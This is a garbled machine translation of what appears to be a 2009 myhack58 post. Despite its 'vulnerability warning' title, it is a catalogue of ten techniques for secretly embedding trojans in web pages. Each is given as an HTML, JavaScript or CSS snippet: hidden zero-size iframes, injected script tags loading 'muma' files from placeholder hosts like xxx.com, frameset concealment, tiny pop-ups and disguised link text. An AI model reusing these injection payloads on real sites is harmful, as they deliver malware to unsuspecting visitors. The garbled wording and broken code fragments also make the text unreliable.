1 0 kind of hung it to the way-vulnerability warning-the black bar safety net

2009-12-07T00:00:00
ID MYHACK58:62200925522
Type myhack58
Reporter 佚名
Modified 2009-12-07T00:00:00

Description

A:The frame hanging horse

<iframe src=address width=0 height=0></iframe>

II:the js file hanging horse

First, the following code document. write("<iframe width='0' height='0' src='address'></iframe>"); 保存 为 xxx.js that The JS hung it to the code <script language=javascript src=xxx. js></script>

Three:js modification encryption

<SCRIPT language="JScript. Encode" src=http://www. xxx. com/muma. txt></script> muma. txt can be changed to any suffix Four:the body hanging horse

<body ></body>

Five:concealed hanging horse

top. document. body. innerHTML = top. document. body. innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

Six:css hang horse

body { background-image: url('javascript:document. write("<script src=http://www. XXX. net/muma. js></script>")')}

Seven:JAJA hung it to the

<SCRIPT language=javascript> window. open ("address","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script>

Eight:picture camouflage

<html> <iframe src="horse address" height=0 width=0></iframe> <img src="image address"></center> </html>

Nine:camouflage call:

<frameset rows="444,0" cols="*"> <frame src="open web page" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src="horse address" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset>

Ten:advanced cheating

<a href="http://www.163.com(to confuse the connection address, display this address points to the Trojan address)" > page content to be displayed </a> <SCRIPT Language="JavaScript"> function www_163_com () { var url="mA address"; open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=8 0 0,height=6 0 0,left=1 0,top=1 0"); }